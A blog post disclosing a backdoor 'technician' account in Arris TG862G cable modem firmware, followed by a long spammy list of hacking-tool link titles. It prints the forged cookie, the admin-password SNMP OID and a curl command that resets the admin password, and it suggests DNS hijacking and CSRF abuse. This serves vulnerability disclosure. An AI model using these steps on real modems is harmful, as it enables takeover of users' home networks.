Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


Related posts

1. Pentest Automation Tools
2. Hacker Security Tools
3. Hacker Tools Apk
4. Wifi Hacker Tools For Windows
5. Physical Pentest Tools
6. Android Hack Tools Github
7. Pentest Tools
8. Physical Pentest Tools
9. Hacking Tools For Windows
10. Pentest Tools List
11. World No 1 Hacker Software
12. Computer Hacker
13. Bluetooth Hacking Tools Kali
14. Pentest Tools Github
15. Hacking Tools Download
16. Hacker Tool Kit
17. Pentest Tools Website Vulnerability
18. Pentest Box Tools Download
19. Install Pentest Tools Ubuntu
20. What Is Hacking Tools
21. Hacking Tools Windows
22. New Hack Tools
23. Hack Tools For Windows
24. Hack Tools
25. Hak5 Tools
26. Pentest Tools Bluekeep
27. Computer Hacker
28. Pentest Tools Port Scanner
29. Hack Tools Mac
30. Hacker Tools For Windows
31. Tools 4 Hack
32. Hacking Tools Pc
33. Hack App
34. Hacking Tools Pc
35. Hak5 Tools
36. Pentest Tools Nmap
37. Kik Hack Tools
38. World No 1 Hacker Software
39. Pentest Tools Windows
40. Pentest Box Tools Download
41. Pentest Reporting Tools
42. Pentest Tools Download
43. Hacker Tools 2019
44. Hack Tools Pc
45. Hak5 Tools
46. What Is Hacking Tools
47. Pentest Tools Open Source
48. Best Hacking Tools 2019
49. Hacking Tools Windows
50. Hacker Tools 2020
51. Usb Pentest Tools
52. Pentest Tools Linux
53. Hacker Tools For Windows
54. Pentest Tools For Mac
55. Pentest Tools For Android
56. Hacker Tools Hardware
57. World No 1 Hacker Software
58. Hack And Tools
59. Pentest Tools
60. Hack Tools Github
61. Hacking Tools Windows
62. Hacker Tools For Pc
63. Pentest Tools Kali Linux
64. Pentest Tools Website
65. Best Hacking Tools 2019
66. Pentest Tools Review
67. Hacker Tools Hardware
68. Pentest Tools Framework
69. Pentest Tools Find Subdomains
70. Hacking Tools For Windows Free Download
71. Kik Hack Tools
72. Hacking Tools Kit
73. Pentest Reporting Tools
74. What Is Hacking Tools
75. Hacking Tools For Mac
76. Hacking Tools Name
77. Hack Website Online Tool
78. Pentest Tools Apk
79. What Is Hacking Tools
80. Hacker Tools Apk
81. Hacks And Tools
82. Black Hat Hacker Tools
83. Hacking Tools Usb
84. Hacking Tools Github
85. How To Hack
86. Hacker Tools Windows
87. Hacking Tools And Software
88. Hacker Tools Github
89. Hacking Tools Kit
90. Hacker Tools 2019
91. Blackhat Hacker Tools
92. Hacking Tools 2020
93. Pentest Tools Url Fuzzer
94. What Are Hacking Tools
95. Hacking Tools For Mac
96. Nsa Hack Tools
97. Hacker Techniques Tools And Incident Handling
98. Bluetooth Hacking Tools Kali
99. Computer Hacker
100. Beginner Hacker Tools
101. New Hack Tools
102. Hacker Tools 2020
103. Hack Tools Mac
104. Pentest Tools Url Fuzzer
105. Hacker Tools 2020
106. Hack Tools Github
107. Hacker Tools Apk
108. Black Hat Hacker Tools
109. Hack Tools Github
110. Hacker Tools Free
111. Hacker Tools 2020
112. Hacker Tools Apk Download
113. Pentest Tools Windows
114. Pentest Tools Tcp Port Scanner
115. Hak5 Tools
116. Hacker Tools
117. Hacking Tools Usb
118. Top Pentest Tools
119. Pentest Tools Website Vulnerability
120. Hacker Tools Github
121. What Are Hacking Tools
122. World No 1 Hacker Software
123. Hacking Tools Github
124. Hacking Tools For Windows Free Download
125. Hacker
126. Top Pentest Tools
127. Hacker Tools Apk
128. Hack App
129. Install Pentest Tools Ubuntu
130. New Hack Tools
131. Hacks And Tools
132. Kik Hack Tools
133. Hack And Tools
134. Hacking Tools For Games
135. Easy Hack Tools
136. Pentest Tools
137. Hack Tools For Games
138. Hacker Techniques Tools And Incident Handling
139. New Hack Tools
140. Termux Hacking Tools 2019
141. Hack Tools Mac
142. Hack Tools Github
143. Pentest Tools For Windows
144. Hack App
145. Game Hacking
146. Hacking Tools For Windows 7
147. Hacking Tools For Beginners
148. Hacking Tools
149. Hacker Tools For Ios
150. Hacker Tools For Pc
151. How To Hack
152. Hack App
153. Pentest Tools Free
154. Hacker Tools For Mac
155. Hacks And Tools
156. Hacker Tools 2019
157. Pentest Tools Android
158. Hacker Techniques Tools And Incident Handling
159. Hack Rom Tools
160. Hacker Tools 2019
161. Pentest Tools Kali Linux
162. Computer Hacker
163. Android Hack Tools Github
164. Kik Hack Tools
165. Pentest Tools
166. Hacks And Tools
167. Wifi Hacker Tools For Windows
168. Hack Tools 2019
169. Beginner Hacker Tools
170. Pentest Tools Github
171. New Hacker Tools
172. Nsa Hacker Tools
173. Pentest Tools Alternative
174. Pentest Tools For Ubuntu
175. How To Make Hacking Tools
176. Pentest Tools Free
177. Github Hacking Tools
178. Easy Hack Tools